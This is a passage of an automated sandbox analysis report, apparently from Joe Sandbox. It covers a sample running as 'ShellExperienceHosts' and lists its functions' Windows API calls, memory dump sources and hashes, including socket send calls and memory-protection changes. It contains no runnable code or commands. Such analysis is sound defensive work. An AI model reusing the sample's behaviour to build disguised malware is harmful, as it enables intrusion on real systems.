                                                                            • Opcode Fuzzy Hash: 05c3d199acf961cd350fbe80a70cd58fa930699b357473c6f4d375fb978d9222
                                                                            • Instruction Fuzzy Hash: 1C412771A00318AFD7349F7DCE41BDABBA9EB84715F10897AE1419BF90D770E9048780
                                                                            Function 6C6B4DCE Relevance: 6.1, APIs: 4, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                            • LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                            • LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                            • SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 446c7d5166e496d24a1de67f30b51fe3bc65521b6c1c20c7bcf2f4c2600c1cc3
                                                                            • Instruction ID: 21b49e0c6eb575abf5b60e10db7748c191a3d24aee4e98b99e97a9b3bcf1ede8
                                                                            • Opcode Fuzzy Hash: 446c7d5166e496d24a1de67f30b51fe3bc65521b6c1c20c7bcf2f4c2600c1cc3
                                                                            • Instruction Fuzzy Hash: 40313B726012146BD7108E658C84A7B73ACEF86719F158429FD11F7780E7B5D827C3BA
                                                                            Function 6C70A4B0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C70A4B7
                                                                              • Part of subcall function 6C740CD1: __EH_prolog3.LIBCMT ref: 6C740CD8
                                                                              • Part of subcall function 6C740CD1: GetClientRect.USER32(6C8876B0,?), ref: 6C740D27
                                                                            • GetClientRect.USER32(?,?), ref: 6C70A50D
                                                                              • Part of subcall function 6C70C950: GetStockObject.GDI32(00000011), ref: 6C70C95F
                                                                              • Part of subcall function 6C70C950: SelectObject.GDI32(?,?), ref: 6C70C971
                                                                              • Part of subcall function 6C6E2275: SetBkMode.GDI32(?,6C6B1A21), ref: 6C6E2289
                                                                              • Part of subcall function 6C6E2275: SetBkMode.GDI32(?,6C6B1A21), ref: 6C6E229B
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 6C70A5A6
                                                                            • SelectObject.GDI32(00000000,?), ref: 6C70A5DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectRect$ClientModeSelect$H_prolog3H_prolog3_InflateStock
                                                                            • String ID:
                                                                            • API String ID: 8310612-0
                                                                            • Opcode ID: 0592f91fd856dceea7676d1f1846a3f6f870266683d1f21a3b27d8e345152555
                                                                            • Instruction ID: 3d7ec5eb5397fcc32c3b3c4b2268a42dd06a502221d276cd4771d3baf0791434
                                                                            • Opcode Fuzzy Hash: 0592f91fd856dceea7676d1f1846a3f6f870266683d1f21a3b27d8e345152555
                                                                            • Instruction Fuzzy Hash: C1415E71A006199FCF01DFA4C988AAD77B6BF4A314F14416DE816BB381CB75A906CF91
                                                                            Function 031B39D3 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                            • String ID:
                                                                            • API String ID: 2478854527-0
                                                                            • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                            • Instruction ID: 5c36862bfe0cc13d8c1639bcb3dda6b95bcd397ab15aa3152d790c78a54cba2f
                                                                            • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                            • Instruction Fuzzy Hash: 29316F35D01730EFFB12EB758C98A96BFB4EB48760B24491AF920DA2B1E7308065DF50
                                                                            Function 6C740CD1 Relevance: 6.1, APIs: 4, Instructions: 108windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C740CD8
                                                                            • GetClientRect.USER32(6C8876B0,?), ref: 6C740D27
                                                                              • Part of subcall function 6C7394AD: GetScrollPos.USER32(?,6C80DF26), ref: 6C7394D9
                                                                              • Part of subcall function 6C7A311C: GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C740D59,00000001,00000000,?,?,?,00000008,6C6FB3D4,?,?,?,000000C8), ref: 6C7A312B
                                                                              • Part of subcall function 6C7A311C: GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C7A313B
                                                                              • Part of subcall function 6C7A311C: EncodePointer.KERNEL32(00000000,?,?,?,00000008,6C6FB3D4,?,?,?,000000C8), ref: 6C7A3144
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C740DC3
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C740DE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleCreate$AddressBitmapClientEncodeH_prolog3HandleModulePointerProcRectScroll
                                                                            • String ID:
                                                                            • API String ID: 1015973060-0
                                                                            • Opcode ID: 71681594c81cd3e72155e81c26046f6996178641df0914205c3102f9a83d9b8c
                                                                            • Instruction ID: 03e67e94c9447b962403b5373c19aec759004e18596507285865ac3a72eed054
                                                                            • Opcode Fuzzy Hash: 71681594c81cd3e72155e81c26046f6996178641df0914205c3102f9a83d9b8c
                                                                            • Instruction Fuzzy Hash: D24170B1601606EFDB40DF69CA88A99BBF4BF19318B00C52DD41887B51DB30E869CFD4
                                                                            Function 6C708C8C Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 6C708D13
                                                                            • RedrawWindow.USER32(?,?,00000000,00000105), ref: 6C708D28
                                                                            • IsRectEmpty.USER32(?), ref: 6C708D80
                                                                            • RedrawWindow.USER32(?,?,00000000,00000105), ref: 6C708DAC
                                                                              • Part of subcall function 6C707D12: RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 6C707D86
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RedrawWindow$EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 138230908-0
                                                                            • Opcode ID: f6f7a6a44956b34032cac44703d378b51e09248af3a33a4abec867b5318ecf69
                                                                            • Instruction ID: d78357208bda5f28f6d008b6c9b3a67b1e548328b70fdfe014319225dcb8aa5c
                                                                            • Opcode Fuzzy Hash: f6f7a6a44956b34032cac44703d378b51e09248af3a33a4abec867b5318ecf69
                                                                            • Instruction Fuzzy Hash: AA414DB5B01615DBDB01CFA4CA89AEEB7F5BF09309F14417AED05AB240C771AA45CF90
                                                                            Function 6C73C850 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C7708FD: GetWindowLongW.USER32(?,000000F0), ref: 6C77090A
                                                                            • GetClientRect.USER32(?,?), ref: 6C73C8B8
                                                                            • IsMenu.USER32(00000000), ref: 6C73C8F4
                                                                            • AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 6C73C90C
                                                                            • GetClientRect.USER32(?,?), ref: 6C73C954
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientWindow$AdjustLongMenu
                                                                            • String ID:
                                                                            • API String ID: 3435883281-0
                                                                            • Opcode ID: 226dae429a5e6f6330d0a463c935a7a2f26c9898c854e5d2dac39a7d9a5ae908
                                                                            • Instruction ID: b26bc02d8a801dfb331c612b530afd6629ae77bd5e1de6aff9a4de2ec61d37e5
                                                                            • Opcode Fuzzy Hash: 226dae429a5e6f6330d0a463c935a7a2f26c9898c854e5d2dac39a7d9a5ae908
                                                                            • Instruction Fuzzy Hash: CD31A371F00359AFDF10DBB5CA4CEBEBBB9AF45208F144229E805A3740DB30A940CBA0
                                                                            Function 0223E3FC Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0223E430
                                                                            • __isleadbyte_l.LIBCMT ref: 0223E463
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0223701E,?,00000000,00000000,?,?,?,?,0223701E,00000000), ref: 0223E494
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0223701E,00000001,00000000,00000000,?,?,?,?,0223701E,00000000), ref: 0223E502
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                            • Instruction ID: c8ad02f424584062f346f7731c6f2c29392acd4b597ea2c25db4bda3c7c74c93
                                                                            • Opcode Fuzzy Hash: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                            • Instruction Fuzzy Hash: 3A31F5B0A20256EFDB22DFE4C8809793BA5FF0C330B0685A8E6658B195E330D944DB51
                                                                            Function 1000E425 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E459
                                                                            • __isleadbyte_l.LIBCMT ref: 1000E48C
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 1000E4BD
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 1000E52B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
                                                                            • Instruction ID: 678bb179593d23e830fa626ca8f93fbb1acc7737e5ff7f739f33e090e4c13c79
                                                                            • Opcode Fuzzy Hash: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
                                                                            • Instruction Fuzzy Hash: 9731AE71A042D6EFEB10CFA4C884AAD3BE6EF013D1B1585A9E4A4AB099D730DD40DB51
                                                                            Function 02234407 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 02234425
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02234434
                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 02234482
                                                                              • Part of subcall function 02233F37: GetCurrentThreadId.KERNEL32 ref: 02233F3C
                                                                              • Part of subcall function 02233F37: send.WS2_32(?,10017440,00000010,00000000), ref: 02233F9D
                                                                              • Part of subcall function 02233F37: SetEvent.KERNEL32(?), ref: 02233FC0
                                                                              • Part of subcall function 02233F37: InterlockedExchange.KERNEL32(?,00000000), ref: 02233FCC
                                                                              • Part of subcall function 02233F37: WSACloseEvent.WS2_32(?), ref: 02233FDA
                                                                              • Part of subcall function 02233F37: shutdown.WS2_32(?,00000001), ref: 02233FF2
                                                                              • Part of subcall function 02233F37: closesocket.WS2_32(?), ref: 02233FFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 4080316033-0
                                                                            • Opcode ID: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                            • Instruction ID: 262de210ee43d1675c91c1c07ebcac3eddaf52da196b4fb5c1c0dc0df4b2c1b4
                                                                            • Opcode Fuzzy Hash: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                            • Instruction Fuzzy Hash: BC2164B6610704ABD621EFB9DC84B97B3E8EF89721F00465EF689C7650D671E404CBA0
                                                                            Function 6C6CC8C9 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,-00000001,00000000,00000000,?,?,6C6CD038,?), ref: 6C6CC8E3
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,?,?,?,?,6C6CD038,?), ref: 6C6CC94A
                                                                            • WideCharToMultiByte.KERNEL32 ref: 6C6CC97B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,000000FF,000000FF,00000000,00000000,00000000,00000000), ref: 6C6CC9AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 626452242-0
                                                                            • Opcode ID: 6905df19c1b72166ec66d7fbc43360ca5e1050a5545607cfdd16699a1cd98d04
                                                                            • Instruction ID: 2a34b93a180a5f05f375a756163619480df12c8426e4ea5a9cca7bb297ce7a4f
                                                                            • Opcode Fuzzy Hash: 6905df19c1b72166ec66d7fbc43360ca5e1050a5545607cfdd16699a1cd98d04
                                                                            • Instruction Fuzzy Hash: ED21D4B15082047FE710AF658C88CABBBF8EF86368F05492DF49987250E631DD04CBA3
                                                                            Function 6C6B4DD8 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                            • LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                            • LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                            • SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 56b3b8cdbc70d8e59eb8940437c4e2478c943a09910a5fc5ea7371adba1dbad3
                                                                            • Instruction ID: d2bf510fce0e6b8da7114982632213fbbd840b5ae0ae9d03bdb54eebc07b79ec
                                                                            • Opcode Fuzzy Hash: 56b3b8cdbc70d8e59eb8940437c4e2478c943a09910a5fc5ea7371adba1dbad3
                                                                            • Instruction Fuzzy Hash: 1821D4317012246BDB204E298C88A7B77ACEF46759B158439FC51EB380E7B5E827C7A5
                                                                            Function 6C85CF0C Relevance: 6.1, APIs: 4, Instructions: 82memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,00000000), ref: 6C85CF35
                                                                            • GetSystemInfo.KERNEL32(?,?,?,00000000), ref: 6C85CF49
                                                                            • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,00000000), ref: 6C85CF9A
                                                                            • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,00000000), ref: 6C85CFAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                            • String ID:
                                                                            • API String ID: 3562403962-0
                                                                            • Opcode ID: ce21a8025fb000440c8aff6552c5d6e7718035bb71f96cbd97fd94f43be4802e
                                                                            • Instruction ID: d9ebdca38d2a059dbcc80046eb223c534b5c79d67242dda22c66cc1f5abd2bb9
                                                                            • Opcode Fuzzy Hash: ce21a8025fb000440c8aff6552c5d6e7718035bb71f96cbd97fd94f43be4802e
                                                                            • Instruction Fuzzy Hash: 0621C772F00219ABDF30DFA5CD88ADEBBB8EB49748F400925E915E7241D7B49904CB91
                                                                            Function 6C70EDE9 Relevance: 6.1, APIs: 4, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C70EEC7: KillTimer.USER32(?,?,?,00000000,00000000,?,?,?,6C70EE14,?,00000000,00000000,00000000,?,00000000,00000000), ref: 6C70EEF2
                                                                            • GetIconInfo.USER32(00000000,?), ref: 6C70EE38
                                                                            • GetObjectW.GDI32(0000007C,00000018,?), ref: 6C70EE47
                                                                            • DeleteObject.GDI32(0000007C), ref: 6C70EE50
                                                                            • DeleteObject.GDI32(?), ref: 6C70EE59
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Delete$IconInfoKillTimer
                                                                            • String ID:
                                                                            • API String ID: 3402499453-0
                                                                            • Opcode ID: 7ad5a3f1fa9f9d3d48187510b5903138ad3265d65d8913b7fd71084615be2e81
                                                                            • Instruction ID: 31c3eef6a44a7586b14d457bf126cd01633de7ad89f40dad0ee434b91deeb40d
                                                                            • Opcode Fuzzy Hash: 7ad5a3f1fa9f9d3d48187510b5903138ad3265d65d8913b7fd71084615be2e81
                                                                            • Instruction Fuzzy Hash: 8D2171B160120DABDF219F60CE48FAE7BF9FF48714F104129F95196A90CB30E945DB94
                                                                            Function 6C746D09 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
